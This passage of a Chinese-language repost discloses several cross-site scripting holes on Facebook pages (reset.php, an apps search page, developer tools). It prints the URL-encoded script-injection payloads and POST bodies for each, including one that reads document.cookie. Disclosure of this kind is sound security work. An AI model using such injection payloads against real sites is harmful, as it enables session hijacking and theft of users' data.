问题页面的镜像：http://www.xssed.com/mirror/53885/
攻击性POST：
email=biz%22%3E%3Cs cript%3Ealert%28%27tohellwithgeorgia%27%29%3C%2Fs cript%3E%3C%22&pass=greetz2evilghost&next=http%3A%2F%2Fiphone.facebook.com%2F&login=Login

3号XSS漏洞：

这是Facebook的Reset Password页面近期再次出现危险的跨站点脚本攻击安全漏洞。恶意用户可以网其中诸如代码并窃取数以百万计的Facebook用户的敏感个人信息。但愿这个漏洞能够得到迅速修复，好在以前他们的反应还是很迅速的。

所在位置：
http://www.facebook.com/reset.php?locale=en_GB%22%3E%3Cs cript%3Ealert(1)%3C/s cript%3E%22%3E%3Cs cript%3Ealert(document.cookie)%3C/s cript%3E

问题页面的镜像：
http://www.xssed.com/mirror/55951/

4号XSS漏洞

所在位置及攻击字符串：
http://apps.facebook.com/blognetworks/searchpage.php?tag=%22%3E%3Cs cript%3Ealert(%22DaiMon%22)%3C/s cript%3E
问题页面的镜像：http://www.xssed.com/mirror/55268/

5号XSS漏洞：

所在位置：http://developers.facebook.com/tools.php?fbml
问题页面的镜像：http://www.xssed.com/mirror/55392/
攻击性POST：
profile=1299125444&position=wide&api_key=%27%22%3E%3C%2Ftitle%3E%3Cs cript%3Ealert%281337%29%3C%2Fs cript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+p3lo%3C%2Fh1%3E%3C%2Fmarquee%3E+&fbml=
Hey you all! Our best wishes for 2009!!! :) ;)

转截请注明:文章来自 pc捍卫者 http://www.pchwz.com 本站发布此文为传递更多信息之目的,不表明pc捍卫者赞同其观点